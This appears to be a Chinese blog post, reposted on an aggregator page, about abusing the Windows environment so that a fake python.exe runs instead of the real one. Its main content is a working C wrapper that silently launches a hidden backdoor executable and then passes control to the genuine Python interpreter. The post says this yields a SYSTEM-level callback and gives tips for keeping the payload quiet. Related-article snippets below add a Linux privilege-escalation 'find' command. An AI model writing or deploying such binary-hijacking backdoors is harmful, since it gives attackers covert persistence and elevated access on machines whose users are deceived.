【Windows提权】windows环境变量滥用维权/提权

news/2024/10/15 22:21:59

原创 掌控安全学院 - camer





#include <windows.h>
#include <stdio.h>int main(int argc, char *argv[]) {// 恶意程序wchar_t* Shell = L"C:\\Windows\\Temp\\shell.exe";HINSTANCE hInstance1 = ShellExecuteW(NULL, L"open", Shell, NULL, NULL, SW_HIDE);// 保证python程序能够正常执行if (argc >= 2) {const char* pythonPath = "C:\\Users\\camer\\AppData\\Local\\Programs\\Python\\Python39\\python.exe";// 构建调用Python脚本的命令char pythonCommand[4096]; // Increased buffer size to accommodate more argumentssnprintf(pythonCommand, sizeof(pythonCommand), "%s %s", pythonPath, argv[1]);// 将额外的参数添加到 Python 命令中for (int i = 2; i < argc; ++i) {strcat(pythonCommand, " ");strcat(pythonCommand, argv[i]);}// 调用Python脚本system(pythonCommand);}return 0;
}

假设用户要使用管理员权限执行python文件,调用python执行命令(python文件随便让GPT生成的):

python 1.py greeting morning

执行成功会发现正常运行输出,但是实际后台执行恶意程序并上线成功,并且具有SYSTEM权限的,如下所示:

0x04 思考总结

普通用户权限调用python也会上线,并且最好shell添加防止进程多开的功能,不然后台容易都是马。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/52553.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

13-神经网络-模型预测

13-神经网络-模型预测

nn.ReLU()是构造了一个ReLU对象,并不是函数调用,而F.ReLU()是函数调用类似于这样来构造我们的层和块,可以比直接用nn.Sequential有更高的灵活性。当然我们也可以在我们的class中使用nn.Sequential,这样组合使用也可以提高灵活性
阅读更多...
订单

订单

当点击结算(car.html)时,会跳转到提交订单页面(palce_order.html)
阅读更多...
信息学奥赛初赛天天练-74-NOIP2016普及组-基础题5-树、父节点、根节点、叶子节点、非叶节点、组合、组合排除法

信息学奥赛初赛天天练-74-NOIP2016普及组-基础题5-树、父节点、根节点、叶子节点、非叶节点、组合、组合排除法

NOIP 2016 普及组 基础题5 21 从一个 44的棋盘(不可旋转)中选取不在同一行也不在同一列上的两个方格,共有( )种方法。 22 约定二叉树的根节点高度为 1。一棵结点数为 2016 的二叉树最少有( )个叶子结点;一棵结点数为 2016 的二叉树最小的高度值是( …
阅读更多...
【Linux提权】check-system文件

【Linux提权】check-system文件

【此次省略一万字.........】 成功突破边界! 提权: 看了sudo -l,发现一个shutdown命令可以,但是这名字应该是重启吧。。。先跑一跑linpeas.sh,试了一下跑出来的CVE,没有成功找一找具有root命令并且我们可以写权限的文件: find / -user root -type f -perm -o=rw -ls 2&g…
阅读更多...
锂电池充电电路 TP4056

锂电池充电电路 TP4056

1. 主要找了下淘宝比较常用的器件,TP4056芯片。SOP8封装,体积稍微有点大。原理简单,这次就先选上 原理图如下:
阅读更多...
【Git操作】回退版本

【Git操作】回退版本

git reset --soft <commit> git reset --hard <commit>  git reset --mixed <commit> //默认这个版本 首先执行git log 查看本地有那些版本的代码。 执行 git reset --soft c97f6b343c6b6d0497ef6dab98010981af1af404//或者 git reset --soft HEDD^执行这个…
阅读更多...
Tarjan 之 割边

Tarjan 之 割边

图片来源 董晓算法本文来自博客园,转载请注明原文链接:https://www.cnblogs.com/sea-and-sky/p/18377823
阅读更多...
PG数据库导致断电/重启无法正常启动问题排查

PG数据库导致断电/重启无法正常启动问题排查

PG数据库导致断电/重启无法正常启动问题排查 一、问题 数据库断电后,启动PG数据库后无法正常启动,报”psql: could not connect to server: No such file or directory”的错误,错误图片如下:二、背景分析 数据库是单机版,使用k8s进行部署运行在指定节点,数据目录挂服务器…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023